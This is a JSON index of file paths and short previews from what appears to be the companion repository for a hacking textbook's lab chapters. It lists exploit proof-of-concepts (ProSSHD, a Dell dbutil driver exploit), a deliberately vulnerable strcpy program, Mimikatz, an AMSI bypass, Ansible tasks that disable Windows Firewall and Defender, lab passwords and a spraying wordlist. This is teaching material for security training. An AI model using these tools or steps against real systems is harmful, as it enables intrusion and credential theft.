"preview": "#include <stdio.h>\r\nmain() {\r\n printf(\"Hello Haxor\");\r\n}"
},
{
"path": "ch13/meet.c",
"chars": 265,
"preview": "#include <stdio.h>\r\ngreeting(char *temp1, char *temp2) {\r\n char name[400];\r\n strcpy(name, temp2);\r\n printf(\"Hel"
},
{
"path": "ch13/prosshd1.py",
"chars": 452,
"preview": "#prosshd3.py POC Exploit\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport "
},
{
"path": "ch13/prosshd2.py",
"chars": 461,
"preview": "#prosshd3.py POC Exploit\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport "
},
{
"path": "ch13/prosshd3.py",
"chars": 1607,
"preview": "#prosshd3.py POC Exploit\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport "
},
{
"path": "ch13/prosshd_dep.py",
"chars": 4158,
"preview": "#prosshd_dep.py\nimport paramiko\nfrom scp import *\nfrom contextlib import closing\nfrom time import sleep\nimport struct\n\nh"
},
{
"path": "ch14/dbutil_exploit/Cargo.toml",
"chars": 283,
"preview": "[package]\nname = \"dbutil\"\nversion = \"0.1.0\"\nedition = \"2018\"\n\n# See more keys and their definitions at https://doc.rust-"
},
{
"path": "ch14/dbutil_exploit/src/bin/exploit.rs",
"chars": 1130,
"preview": "use dbutil::{get_kernel_base, open_dev, read_ptr, write_ptr};\r\nuse winapi::um::libloaderapi::{GetProcAddress, LoadLibrar"
},
{
"path": "ch14/dbutil_exploit/src/bin/ioctlcall.rs",
"chars": 439,
"preview": "use dbutil::{ioctl, open_dev};\r\n\r\nfn main() {\r\n let hdev = unsafe { open_dev() };\r\n let args: Vec<String> = std::e"
},
{
"path": "ch14/dbutil_exploit/src/lib.rs",
"chars": 2090,
"preview": "use std::mem::size_of;\nuse std::ptr::null_mut;\nuse winapi::um::{fileapi::*, ioapiset::*, psapi::*, winnt::*};\n\n#[repr(C)"
},
{
"path": "ch14/dbutil_exploit.c",
"chars": 2946,
"preview": "#include <windows.h>\n#pragma comment(lib, \"psapi.lib\")\n\nconst unsigned long PID_OFFSET = 0x440;\nconst unsigned long APLI"
},
{
"path": "ch14/dbutil_exploit.py",
"chars": 5531,
"preview": "from ctypes import (\n windll,\n LittleEndianStructure,\n POINTER,\n byref,\n cast,\n sizeof,\n c_uint64,\n"
},
{
"path": "ch14/ioctlcall.py",
"chars": 3308,
"preview": "from ctypes import windll, POINTER, byref\nfrom ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE\n\n\ngle ="
},
{
"path": "ch15/Lab/ansible/ansible.cfg",
"chars": 38,
"preview": "[defaults]\nhost_key_checking = False\n\n"
},
{
"path": "ch15/Lab/ansible/ch15_playbook.yml",
"chars": 202,
"preview": "---\n- hosts: target\n roles:\n - common\n - target_customizations\n vars_files:\n - vars/vars.yml\n- hosts: kali \n "
},
{
"path": "ch15/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
},
{
"path": "ch15/Lab/ansible/roles/common/handlers/main.yml",
"chars": 4,
"preview": "---\n"
},
{
"path": "ch15/Lab/ansible/roles/common/meta/main.yml",
"chars": 308,
"preview": "---\ngalaxy_info:\n role_name: install_misc_software\n author: Russ Nolen rnolen@splunk.com\n description: Install some b"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/chocolatey-components.yml",
"chars": 366,
"preview": "---\n- name: Install Chocolately via Powershell\n win_shell: \"Set-ExecutionPolicy Bypass -Scope Process -Force; [System.N"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/main.yml",
"chars": 191,
"preview": "---\n# need to wrap an if statement around this one\n# make it windows specific\n- name : Disable Windows Firewall\n win_fi"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/windows-components.yml",
"chars": 280,
"preview": "---\n- name: Install the Visual C++ Redistributable\n win_package:\n path: \"https://download.microsoft.com/download/9/3"
},
{
"path": "ch15/Lab/ansible/roles/common/tasks/windows-disable-defender.yml",
"chars": 210,
"preview": "---\n\n- name: Disable Windows Defender\n win_regedit:\n key: \"HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\R"
},
{
"path": "ch15/Lab/ansible/roles/kali_customizations/files/Invoke-Mimikatz.ps1",
"chars": 2855418,
"preview": "function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflecti"
},
{
"path": "ch15/Lab/ansible/roles/kali_customizations/files/amsi.ps1",
"chars": 5638,
"preview": "Write-Host \"-- AMSI Patch\"\nWrite-Host \"-- Modified By: Shantanu Khandelwal (@shantanukhande)\"\nWrite-Host \"-- Original Au"
},
{
"path": "ch15/Lab/ansible/roles/kali_customizations/tasks/main.yml",
"chars": 1760,
"preview": "---\n- name: Make python3 default\n alternatives:\n name: python\n path: /usr/bin/python3\n link: /usr/bin/pyth"
},
{
"path": "ch15/Lab/ansible/roles/target_customizations/tasks/main.yml",
"chars": 1169,
"preview": "---\n- name: install dotnet core\n win_feature:\n name: Net-Framework-Core\n state: present\n- name: choco"
},
{
"path": "ch15/Lab/ansible/vars/users.yml",
"chars": 333,
"preview": "---\n#domain_users:\n#- { name : \"target\", password : \"Winter2021\" , groups : \"\" }\n#- { name : \"ghhadmin\" , password : \"Gr"
},
{
"path": "ch15/Lab/ansible/vars/vars.yml",
"chars": 234,
"preview": "windows_domain_controller_info:\n dns_domain_name: ghh.local\n domain_admin_password: GrayHatHack1ng!\n domain_admin_"
},
{
"path": "ch15/Lab/build.sh",
"chars": 145,
"preview": "#!/bin/bash\n\ncd terraform \nterraform init && terraform validate && terraform apply\ncd ../ansible\nansible-playbook -i inv"
},
{
"path": "ch15/Lab/destroy.sh",
"chars": 43,
"preview": "#!/bin/bash\ncd terraform\nterraform destroy\n"
},
{
"path": "ch15/Lab/get-ips.sh",
"chars": 421,
"preview": "#!/bin/bash\nTARGET_IP=`jq -r '.resources[] | select(.name == \"ghh_target\")| .instances[0].attributes.public_ip' terrafor"
},
{
"path": "ch15/Lab/terraform/aws_data.tf",
"chars": 706,
"preview": "data \"aws_availability_zones\" \"this\" {\n state = \"available\"\n}\n\ndata \"aws_ami\" \"ghh-kali\" {\n most_recent = true\n\n filt"
},
{
"path": "ch15/Lab/terraform/aws_hosts.tf",
"chars": 1049,
"preview": "\nlocals {\n dc-userdata = <<EOF\n<powershell>\n $admin = [adsi](\"WinNT://./administrator, user\")\n $admin.psbase.invoke(\""
},
{
"path": "ch15/Lab/terraform/inventory.tmpl",
"chars": 124,
"preview": "${cat}:\n hosts:\n%{for addr in ip_addrs ~}\n ${addr}:\n%{endfor ~}\n vars:\n%{for var in vars ~}\n ${var}\n%{endfor"
},
{
"path": "ch15/Lab/terraform/main.tf",
"chars": 150,
"preview": "provider \"aws\" {\n shared_credentials_file = var.shared_credentials_file\n region = \"us-east-1\"\n profi"
},
{
"path": "ch15/Lab/terraform/outputs.tf",
"chars": 1050,
"preview": "output \"target_password\" { value = rsadecrypt(aws_instance.ghh_target.password_data, file(var.key_path)) }\n\noutput \""
},
{
"path": "ch15/Lab/terraform/terraform.tfvars-orig",
"chars": 34,
"preview": "key_path=\"<path to your SSH KEY>\"\n"
},
{
"path": "ch15/Lab/terraform/variables.tf",
"chars": 676,
"preview": "variable \"aws_region\" {\n default = \"us-east-1\"\n}\nvariable \"aws_profile\" {\n default = \"ghh\"\n}\nvariable \"dc_password\" {\n"
},
{
"path": "ch15/Lab/terraform/versions.tf",
"chars": 0,
"preview": ""
},
{
"path": "ch15/Lab/terraform/vpc.tf",
"chars": 2717,
"preview": "resource \"aws_vpc\" \"this\" {\n\n cidr_block = \"10.0.0.0/16\"\n enable_dns_hostnames = true\n enable_dns_support "
},
{
"path": "ch15/README.md",
"chars": 2300,
"preview": "# Gray Hat Hacking v6 Lab 15\r\nThis directory contains all the components necessary for Lab 15.\r\n\r\n## Lab Information \r\n"
},
{
"path": "ch16/Lab/ansible/ansible.cfg",
"chars": 38,
"preview": "[defaults]\nhost_key_checking = False\n\n"
},
{
"path": "ch16/Lab/ansible/ch16_playbook.yml",
"chars": 560,
"preview": "---\n- hosts: dc\n roles:\n - common\n - windows_dns_server\n - windows_domain_controller\n - windows_domain_user"
},
{
"path": "ch16/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
},
{
"path": "ch16/Lab/ansible/roles/common/handlers/main.yml",
"chars": 4,
"preview": "---\n"
},
{
"path": "ch16/Lab/ansible/roles/common/meta/main.yml",
"chars": 308,
"preview": "---\ngalaxy_info:\n role_name: install_misc_software\n author: Russ Nolen rnolen@splunk.com\n description: Install some b"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/chocolatey-components.yml",
"chars": 366,
"preview": "---\n- name: Install Chocolately via Powershell\n win_shell: \"Set-ExecutionPolicy Bypass -Scope Process -Force; [System.N"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/main.yml",
"chars": 284,
"preview": "---\n# need to wrap an if statement around this one\n# make it windows specific\n- name : Disable Windows Firewall\n win_fi"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/windows-components.yml",
"chars": 280,
"preview": "---\n- name: Install the Visual C++ Redistributable\n win_package:\n path: \"https://download.microsoft.com/download/9/3"
},
{
"path": "ch16/Lab/ansible/roles/common/tasks/windows-disable-defender.yml",
"chars": 210,
"preview": "---\n\n- name: Disable Windows Defender\n win_regedit:\n key: \"HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\R"
},
{
"path": "ch16/Lab/ansible/roles/kali_customizations/tasks/main.yml",
"chars": 1085,
"preview": "---\n- name: Make python3 default\n alternatives:\n name: python\n path: /usr/bin/python3\n link: /usr/bin/pyth"
},
{
"path": "ch16/Lab/ansible/roles/target_customizations/tasks/main.yml",
"chars": 1197,
"preview": "---\n- name: Update Local Security Policy to allow users to run scheduled tasks\n win_user_right:\n name: SeBatchLogonR"
},
{
"path": "ch16/Lab/ansible/roles/util_customizations/tasks/main.yml",
"chars": 962,
"preview": "---\n- name: install dotnet core\n win_feature:\n name: Net-Framework-Core\n state: present\n- name: choco"
},
{
"path": "ch16/Lab/ansible/roles/windows_client_join_domain/tasks/main.yml",
"chars": 654,
"preview": "---\n- name: Gather facts from new server\n setup:\n filter: ansible_default_ipv4.address\n \n- name: setu"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/tasks/features.yml",
"chars": 197,
"preview": "---\n- name: features | Installing Windows DNS Server\n win_feature:\n name: DNS\n state: present\n include_managem"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/tasks/main.yaml",
"chars": 47,
"preview": "- include: features.yml\n- include: reboot.yml \n"
},
{
"path": "ch16/Lab/ansible/roles/windows_dns_server/tasks/reboot.yml",
"chars": 190,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n when: >\n _windows_dns_server['rest"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/tasks/create.yml",
"chars": 1445,
"preview": "---\n# tasks file for ansible-windows-domain-controller\n#\n\n\n- name: set local admin password\n win_user:\n name: Admini"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/tasks/main.yaml",
"chars": 45,
"preview": "- include: create.yml\n- include: reboot.yml \n"
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_controller/tasks/reboot.yml",
"chars": 245,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n shutdown_timeout_sec: 3600\n when: "
},
{
"path": "ch16/Lab/ansible/roles/windows_domain_users_groups/tasks/main.yml",
"chars": 920,
"preview": "---\n- name: Disable domain password complexity\n win_shell: 'Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser | S"
},
{
"path": "ch16/Lab/ansible/roles/windows_local_group_membership/tasks/main.yml",
"chars": 193,
"preview": "---\n- name: add users to local groups for remote login\n win_group_membership:\n name: \"Remote Desktop Users\"\n "
},
{
"path": "ch16/Lab/ansible/vars/users.yml",
"chars": 333,
"preview": "---\n#domain_users:\n#- { name : \"target\", password : \"Winter2021\" , groups : \"\" }\n#- { name : \"ghhadmin\" , password : \"Gr"
},
{
"path": "ch16/Lab/ansible/vars/vars.yml",
"chars": 234,
"preview": "windows_domain_controller_info:\n dns_domain_name: ghh.local\n domain_admin_password: GrayHatHack1ng!\n domain_admin_"
},
{
"path": "ch16/Lab/build.sh",
"chars": 145,
"preview": "#!/bin/bash\n\ncd terraform \nterraform init && terraform validate && terraform apply\ncd ../ansible\nansible-playbook -i inv"
},
{
"path": "ch16/Lab/destroy.sh",
"chars": 43,
"preview": "#!/bin/bash\ncd terraform\nterraform destroy\n"
},
{
"path": "ch16/Lab/terminate-util.sh",
"chars": 468,
"preview": "#!/bin/bash\ninstance=`jq -r '.resources[] |select( .name == \"ghh_util\") | .instances[0].attributes.id ' terraform/terra"
},
{
"path": "ch16/Lab/terraform/aws_data.tf",
"chars": 706,
"preview": "data \"aws_availability_zones\" \"this\" {\n state = \"available\"\n}\n\ndata \"aws_ami\" \"ghh-kali\" {\n most_recent = true\n\n filt"
},
{
"path": "ch16/Lab/terraform/aws_hosts.tf",
"chars": 2012,
"preview": "\nlocals {\n dc-userdata = <<EOF\n<powershell>\n $admin = [adsi](\"WinNT://./administrator, user\")\n $admin.psbase.invoke(\""
},
{
"path": "ch16/Lab/terraform/inventory.tmpl",
"chars": 124,
"preview": "${cat}:\n hosts:\n%{for addr in ip_addrs ~}\n ${addr}:\n%{endfor ~}\n vars:\n%{for var in vars ~}\n ${var}\n%{endfor"
},
{
"path": "ch16/Lab/terraform/main.tf",
"chars": 150,
"preview": "provider \"aws\" {\n shared_credentials_file = var.shared_credentials_file\n region = \"us-east-1\"\n profi"
},
{
"path": "ch16/Lab/terraform/outputs.tf",
"chars": 2372,
"preview": "output \"dc_password\" { value = rsadecrypt(aws_instance.ghh_dc.password_data, file(var.key_path)) }\noutput \"target_pa"
},
{
"path": "ch16/Lab/terraform/terraform.tfvars-orig",
"chars": 34,
"preview": "key_path=\"<path to your SSH KEY>\"\n"
},
{
"path": "ch16/Lab/terraform/variables.tf",
"chars": 676,
"preview": "variable \"aws_region\" {\n default = \"us-east-1\"\n}\nvariable \"aws_profile\" {\n default = \"ghh\"\n}\nvariable \"dc_password\" {\n"
},
{
"path": "ch16/Lab/terraform/versions.tf",
"chars": 0,
"preview": ""
},
{
"path": "ch16/Lab/terraform/vpc.tf",
"chars": 2717,
"preview": "resource \"aws_vpc\" \"this\" {\n\n cidr_block = \"10.0.0.0/16\"\n enable_dns_hostnames = true\n enable_dns_support "
},
{
"path": "ch16/README.md",
"chars": 3057,
"preview": "# Gray Hat Hacking v6 Chapter 16\r\nThis directory contains all the components necessary for Chapter 16.\r\n\r\n## Lab Informa"
},
{
"path": "ch16/passwords.txt",
"chars": 70,
"preview": "Winter\nwinter\nSpring\nspring\nSummer\nsummer\nFall\nfall\nPassword\npassword\n"
},
{
"path": "ch17/Lab/ansible/ansible.cfg",
"chars": 66,
"preview": "[defaults]\nhost_key_checking = False\nenable_task_debugger = True\n\n"
},
{
"path": "ch17/Lab/ansible/ch17_playbook.yml",
"chars": 456,
"preview": "---\n- hosts: dc\n roles:\n - common\n - windows_dns_server\n - windows_domain_controller\n - windows_domain_user"
},
{
"path": "ch17/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
}
]